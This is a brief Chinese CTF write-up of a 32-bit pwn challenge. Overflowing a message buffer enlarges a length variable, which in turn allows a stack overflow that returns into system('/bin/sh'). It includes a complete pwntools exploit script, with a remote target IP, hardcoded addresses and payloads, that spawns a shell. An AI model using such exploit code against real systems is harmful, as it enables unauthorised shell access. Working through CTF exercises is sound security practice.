本文最后更新于1801天前,其中的信息可能已经有所发展或是发生改变。
拖进ida,有system函数无/bin/sh字符串,主函数里如果choice!=1就不会进入message函数,所以第一个输入就sendline(‘1’)就行了
message函数:
char s; // [esp+18h] [ebp-30h] n = 10; puts("you can leave some message here:"); fgets(A, 60, stdin); puts("your name please:"); fgets(&s, n, stdin); return puts("Thank you");
a可以用来存放/bin/sh字符串,n的地址就在a后面,而a的大小只有40,所以输入超过40的话就可以改变n的值,让s(大小为0x30)产生栈溢出,最终覆盖掉message函数的返回地址,进入system函数。
脚本如下:
from pwn import * sh=remote('182.254.217.142',10001) sh.recvuntil('your choice:') sh.sendline('1') sh.recvuntil('you can leave some message here:') payload='/bin/sh\0'+'a'*40 sh.sendline(payload) sh.recvuntil('your name please:') payload='a'*0x30+'a'*4+p32(0x80483f0)+'a'*4+p32(0x0804a080) sh.sendline(payload) sh.interactive()
随后按照题目提示进入目录cat flag即可
点击数:263